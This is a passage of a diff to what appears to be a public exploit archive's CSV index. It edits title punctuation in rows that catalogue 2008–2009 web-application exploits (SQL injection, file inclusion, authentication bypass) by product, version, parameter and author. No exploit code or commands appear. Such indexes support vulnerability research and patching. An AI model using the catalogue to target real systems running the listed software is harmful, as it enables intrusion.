Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5454,platforms/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,php,webapps,0 @@ -19533,7 +19534,7 @@ id,file,description,date,author,platform,type,port 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' SQL Injection",2008-05-09,JosS,php,webapps,0 -5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 +5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php?cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0 5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 @@ -19746,7 +19747,7 @@ id,file,description,date,author,platform,type,port 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 -5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 +5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - 'section' SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 @@ -19810,7 +19811,7 @@ id,file,description,date,author,platform,type,port 5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps,0 -5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 +5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,php,webapps,0 @@ -19862,7 +19863,7 @@ id,file,description,date,author,platform,type,port 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusions",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 -5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'Parameters.php' Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 +5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'params.php?gConf[dir][layouts]' Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps,0 @@ -20004,7 +20005,7 @@ id,file,description,date,author,platform,type,port 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' SQL Injection",2008-07-26,U238,asp,webapps,0 -6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 +6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - 'SQL' Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps,0 6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0 @@ -20091,7 +20092,7 @@ id,file,description,date,author,platform,type,port 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 -6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 +6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - 'configure' Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6273,platforms/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 @@ -20168,7 +20169,7 @@ id,file,description,date,author,platform,type,port 6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' SQL Injection",2008-09-06,ZoRLu,php,webapps,0 -6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 +6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - Insecure Directory Download Database",2008-09-06,TheJT,php,webapps,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 @@ -20178,7 +20179,7 @@ id,file,description,date,author,platform,type,port 6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 -6404,platforms/php/webapps/6404.txt,"Live TV Script - 'index.php mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 +6404,platforms/php/webapps/6404.txt,"Live TV Script - 'index.php?mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps,0 @@ -20266,7 +20267,7 @@ id,file,description,date,author,platform,type,port 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps,0 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps,0 -6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0 +6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - 'cookie_language' Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 @@ -20419,7 +20420,7 @@ id,file,description,date,author,platform,type,port 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 -6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 +6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 @@ -20477,8 +20478,8 @@ id,file,description,date,author,platform,type,port 6791,platforms/php/webapps/6791.pl,"e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' SQL Injection",2008-10-20,boom3rang,php,webapps,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 -6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 -6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 +6796,platforms/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,php,webapps,0 +6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - 'GET' / 'POST' / 'COOKIE' Local File Inclusion",2008-10-21,JosS,php,webapps,0 6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' SQL Injection",2008-10-21,"Hussin X",php,webapps,0 6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 @@ -20487,7 +20488,7 @@ id,file,description,date,author,platform,type,port 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 -6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 +6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - Delete All Users / SQL Injection Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 @@ -20504,7 +20505,7 @@ id,file,description,date,author,platform,type,port 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injections",2008-10-25,G4N0K,php,webapps,0 -6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 +6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php?id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - 'lecture.php' SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 @@ -20576,7 +20577,7 @@ id,file,description,date,author,platform,type,port 6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - 'where' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - SQL Injection",2008-11-01,ZoRLu,php,webapps,0 -6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 +6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - Insecure Cookie Handling / SQL Injection",2008-11-01,JosS,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 @@ -20655,8 +20656,8 @@ id,file,description,date,author,platform,type,port 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,php,webapps,0 -7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0 -7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0 +7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution",2008-11-05,~elmysterio,php,webapps,0 +7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - 'PHPWebAdmin' File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps,0 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - Authentication Bypass",2008-11-06,InjEctOr5,php,webapps,0 @@ -20722,7 +20723,7 @@ id,file,description,date,author,platform,type,port 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0 -7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 +7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' SQL Injection",2008-11-11,boom3rang,php,webapps,0 @@ -20847,7 +20848,7 @@ id,file,description,date,author,platform,type,port 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0 -7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 +7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - 'HotelID' SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 @@ -20894,7 +20895,7 @@ id,file,description,date,author,platform,type,port 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0 -7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 +7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - URL Rewrite Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusions",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - 'site' SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 @@ -20959,7 +20960,7 @@ id,file,description,date,author,platform,type,port 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 -7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 +7386,platforms/php/webapps/7386.pl,"phpBB 3 - Mod Tag Board 4 Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,asp,webapps,0 @@ -21031,7 +21032,7 @@ id,file,description,date,author,platform,type,port 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 +7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - 'token' Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,php,webapps,0 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0 @@ -21092,7 +21093,7 @@ id,file,description,date,author,platform,type,port 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,php,webapps,0 -7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0 +7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - 'Forum' Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 @@ -21102,7 +21103,7 @@ id,file,description,date,author,platform,type,port 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - 'password_recovery.php' Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps,0 7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 -7562,platforms/php/webapps/7562.txt,"PHPAdBoard - (PHP uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 +7562,platforms/php/webapps/7562.txt,"PHPAdBoard - PHP uploads Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7563,platforms/php/webapps/7563.txt,"phpEmployment - 'PHP Upload' Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - SQL Injection",2008-12-23,Samir-M,php,webapps,0 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 @@ -21149,7 +21150,7 @@ id,file,description,date,author,platform,type,port 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 -7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 +7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - 'acp/backup' Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7631,platforms/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,php,webapps,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps,0 @@ -21167,14 +21168,14 @@ id,file,description,date,author,platform,type,port 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - 'ModName' Multiple Local File Inclusions",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0 -7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 +7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php?id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0 -7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0 +7669,platforms/php/webapps/7669.pl,"Joomla! 